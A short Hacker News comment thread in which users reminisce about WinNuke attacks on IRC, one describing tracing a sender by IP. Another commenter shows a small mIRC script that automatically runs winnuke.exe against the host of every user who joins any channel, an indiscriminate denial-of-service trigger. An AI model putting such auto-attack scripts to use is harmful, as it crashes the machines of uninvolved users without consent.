Hacker News new | past | comments | ask | show | jobs | submit login

I remember patching it and then scripting mirc to seek out the handle of the person who sent it via the source IP.



I scripted mIRC to WinNuke everyone on join in all channels. Something like this:

    ON *:join:#: {
        /run c:\winnuke.exe $gettok($address,2,64)
    }




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: